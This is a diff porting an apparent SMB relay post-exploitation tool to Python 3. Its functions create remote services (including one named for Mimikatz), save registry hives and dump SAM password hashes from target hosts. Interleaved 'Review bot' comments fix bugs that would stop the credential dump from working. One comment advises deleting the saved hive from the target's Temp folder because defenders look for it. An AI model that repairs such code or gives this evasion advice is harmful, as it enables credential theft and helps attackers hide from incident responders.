@@ -101,168 +101,168 @@ def IsSMBAnonymous(data): return False def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting): - LMhashLen = struct.unpack(' 24: - DomainLen = struct.unpack(' 24: + DomainLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() - DomainLen = struct.unpack(' 60: + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() + DomainLen = struct.unpack('60: minutes = Seconds/60 - print 'Fetched in: %.3g minutes.'%(minutes) + print ('Fetched in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Fetched in: %.3g seconds'%(Seconds) - print "Output:\n", Output + print ('Fetched in: %.3g seconds'%(Seconds)) + print ("Output:\n", Output) return data,s,f ###################################### @@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC Create Service. @@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) - #print "[+] Creating service" + #print ("[+] Creating service") ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[88:108] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) 
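Review bot: The commented-out `#print ("[+] Creating service")` in CreateMimikatzService (@@ -660) was ported to the new print syntax rather than removed; dead code that has to be kept in sync by hand is the usual sign it should go, so delete the line, and the identical one in CreateService (@@ -863). In the @@ -101 hunk `print ("Output:\n", Output)` now prints the two arguments space-separated, which matches the old `print "Output:\n", Output` output, so no regression there; if the extra space before `Output` is unwanted, `print ("Output:\n" + Output)` drops it.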
@@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) 
@@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLControlService, stop operation. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLDeleteService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to stop the service.\n" + print ("[+] Failed to stop the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) 
@@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to delete the service.\n" + print ("[+] Failed to delete the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -846,7 +846,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC Create Service. @@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) - #print "[+] Creating service" + #print ("[+] Creating service") ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[88:108] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) 
@@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLControlService, stop operation. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") 
@@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLDeleteService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) @@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to delete the service.\n" + print ("[+] Failed to delete the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) 
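Review bot: The message under `## DCE/RPC SVCCTLDeleteService.` names the wrong step: the response checked there is for the ControlService stop request built just above it, so `print ("[+] Failed to start the service.\n")` should read `print ("[+] Failed to stop the service.\n")`, which is what the equivalent branch in StopAndDeleteService prints. Because the identical "Failed to start" text is also used for the StartService response earlier in CreateService, an operator reading the output cannot tell which step of the create/start/stop/delete sequence broke. CreateService starts and ends outside this hunk.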
@@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) + #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)) #ContextHandlerService = data[88:108] ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) 
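Review bot: The OpenService failure branch prints `[+] Failed to create the service`, but StartWinregService never creates a service — its signature `(f, host, data, s)` carries no ServiceNameChars, and the commented-out line right below it, `#print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))`, references names that are not in scope here, which suggests the block was copied from CreateService. Change the message to describe what actually failed (presumably opening the service; the service name is set outside the hunk) and delete the commented-out print instead of porting it to Python 3 syntax, since uncommenting it would raise NameError. StopWinregService has the identical copy. The function begins before the hunk.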
@@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) + #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)) #ContextHandlerService = data[88:108] ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) 
@@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to stop the service.\n" + print ("[+] Failed to stop the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s): data = s.recv(2048) if data[8:10] == "\x2d\x22": - print "[+] Can't open the file, access is denied (write protected file?)." + print ("[+] Can't open the file, access is denied (write protected file?).") f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f @@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s): ##OpenAndX. if data[8:10] == "\x2d\x34": - print "[+] The command failed or took to long to complete." + print ("[+] The command failed or took to long to complete.") return data, s ##all good. 
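Review bot: The OpenAndX failure branch of SMBOpenFile, `if data[8:10] == "\x2d\x34": ... return data, s`, returns two values while callers unpack three (`data,s,f = SMBOpenFile(...)` in ReadFile), so instead of the "command failed or took to long" message the caller gets a ValueError — the opposite of what the comment in the access-denied branch above ("Don't throw an exception at the calling function because there's not enough value to unpack") intends. Use the same sentinel there: `f = "A"` followed by `return data, s, f`. On Python 3 the `"\x2d\x34"` and `"\x2d\x22"` comparisons also need bytes literals, since `data` comes from `s.recv(2048)`. The function ends outside the hunk.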
@@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, data = s.recv(2048) if data[8:10] == "\xa2\x22": - print "[+] Can't open the file, access is denied (write protected file?)." + print ("[+] Can't open the file, access is denied (write protected file?).") f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f if data[8:10] == "\xa2\x35": - print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename + print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename) f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f @@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, ##OpenAndX. if data[8:10] == "\xa2\x34": - print "[+] The command failed or took to long to complete." + print ("[+] The command failed or took to long to complete.") return data, s ##all good. @@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s): ##Do large reads.. if data[8:10] == "\x2e\x00" and struct.unpack(" 65520. first = filesize-65520 @@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.'%(minutes) + print ('Downloaded in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + print ('Downloaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2e\x00": 
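Review bot: In SMBOpenFileForWriting the `"\xa2\x34"` branch does `return data, s` while the access-denied and name-collision branches just above it deliberately set `f = "A"` and `return data, s, f` so that the three-value unpack in callers does not fail; this branch should do the same, otherwise the "took to long" case surfaces as a ValueError rather than the printed message. While touching the line, `took to long` should read `took too long`. The function continues past the hunk.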
@@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s): count = 0 bar = 80 start_time = time.time() - print 'File size: %s'%(GetReadableSize(FileSize)) + print ('File size: %s'%(GetReadableSize(FileSize))) for i in xrange(count_number): count = count+1 Chunk = FileContent[dataoffset:dataoffset+30000] @@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Uploaded in: %.3g minutes.'%(minutes) + print ('Uploaded in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Uploaded in: %.3g seconds'%(Seconds) + print ('Uploaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2f\x00": @@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s): ##Do large reads.. if data[8:10] == "\x2e\x00" and struct.unpack(" 65520. first = filesize-65520 @@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.\n'%(minutes) + print ('Downloaded in: %.3g minutes.\n'%(minutes)) if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + print ('Downloaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2e\x00": 
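Review bot: `for i in xrange(count_number):` raises NameError on Python 3 — `xrange` was removed — so UploadAndWrite fails on its first chunk even though this commit declares the file ported; change it to `for i in range(count_number):`. In the lines visible here the index is not used (the body advances `count` and slices by `dataoffset`), so `for _ in range(count_number):` would be clearer if that holds for the rest of the loop. The function starts before the hunk.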
@@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host): data = s.recv(2048) if data[8:10] == "\x06\x21": - print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process." - print "[+] Try taskkill /F /IM process_name, then delete the file." + print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.") + print ("[+] Try taskkill /F /IM process_name, then delete the file.") return data, s if data[8:10] == "\x06\x34": - print "[+] Delete Failed. File not found." + print ("[+] Delete Failed. File not found.") return data, s if data[8:10] == "\x06\x00": @@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath): ## DCE/RPC Query Info. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to read the key\n" + print ("[+] Failed to read the key\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath): ## DCE/RPC CloseKey. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to close the key\n" + print ("[+] Failed to close the key\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) @@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData): Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] for i in range(len(JDSkew1GBGData)): Key += JDSkew1GBGData[Xored[i]] - print 'BootKey: %s' % Key.encode("hex") + print ('BootKey: %s' % Key.encode("hex")) return Key ##########Dump Hashes############# 
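Review bot: `Key.encode("hex")` in ConvertValuesToBootKey does not work on Python 3: `str.encode` takes a text codec and `"hex"` is not one (LookupError), and if `Key` is accumulated as bytes it has no `.encode` at all, so the function crashes right before returning the boot key and the bare `except` blocks in DumpHashes will mask the real cause. Use `binascii.hexlify(Key).decode()` (or `Key.hex()` once Key is bytes), e.g. `print ('BootKey: %s' % binascii.hexlify(Key).decode())`. Whether `Key` is str or bytes depends on how JDSkew1GBGData is produced, which is outside the hunk.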
@@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host): data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." + print ("The Windows Remote Registry Service is sleeping, waking it up...") time.sleep(3) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "Retrying..." + print ("Retrying...") time.sleep(5) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) @@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host): ##Error handling. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" + print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ##Grab the keys if data[8:10] == "\x25\x00": 
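Review bot: The interface UUID passed to BindCall, `"\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03"`, is a str on Python 3 rather than the 16 raw bytes it was on Python 2; code points such as `\xd0` and `\x8c` become two bytes each under a UTF-8 encode, so unless BindCall serialises with latin-1 the bind request carries a corrupted UUID and the two retries here will keep failing for a reason unrelated to the Remote Registry service being asleep. Write it as a bytes literal, `b"\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03"`, and likewise `b"\x01\x00"`. How BindCall converts the value is outside the hunk, so this is inferred.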
@@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host): Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp") WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt") except: - print "[+] Live dump failed, is python-crypto installed? " + print ("[+] Live dump failed, is python-crypto installed? ") pass - print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt" + print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt") return data except: #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########Save An HKLM Key And Its Subkeys############# @@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key): data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." + print ("The Windows Remote Registry Service is sleeping, waking it up...") time.sleep(3) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "Retrying..." + print ("Retrying...") time.sleep(5) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) 
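Review bot: The success message in DumpHashes is printed even when the hash dump failed: the inner `except` only prints "Live dump failed" and `pass`es, after which execution reaches `print ("[+] The SAM file was saved in: ... and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")`. That filename is also wrong — the hashes are written with `WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")`, so the operator is pointed at a file that never exists. Move the hashes sentence inside the `try` after `WriteOutputToFile` and correct it to `Hash-Dump-`, and replace the bare `except:` with `except Exception as e:` that prints `e`, since on this Python 3 port the likely failure is a bytes/str TypeError rather than missing python-crypto.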
@@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key): ##Error handling. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" + print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") return ModifySMBRetCode(data) data,s,handler,f = OpenHKLM(data,s,f) data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) if data[8:10] != "\x25\x00": - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) data,s = CloseFID(f, data, s) data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) @@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key): #After everything has been cleaned up, we write the output to a file. WriteOutputToFile(Output, Host+"-"+Key+".tmp") - print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp" + print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp") return data except: #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########ReadAFile############# @@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host): File = File.replace("/","\\") data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,Output = GrabAndRead(f, File, data, s) - print Output + print (Output) return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Read failed. Remote filename was typed correctly?" + print ("[+] Read failed. Remote filename was typed correctly?") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. def GetAfFile(data, s, File, Host): 
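Review bot: The failure path of SaveAKey leaves a copy of the registry hive on the target: `SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)` writes it, and the outer `except` just prints `[+] Something went wrong, try something else.` and returns, so any exception after the save leaves a SAM/SYSTEM hive copy in Temp, exactly the artefact defenders look for. Attempt removal before returning, e.g. `data = DeleteFile(data, s, "\\Windows\\Temp\\"+Key+".tmp", Host)` as RunAsCmd's except does. The success-path cleanup ("After everything has been cleaned up") happens outside the hunk, so I cannot confirm it covers this case.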
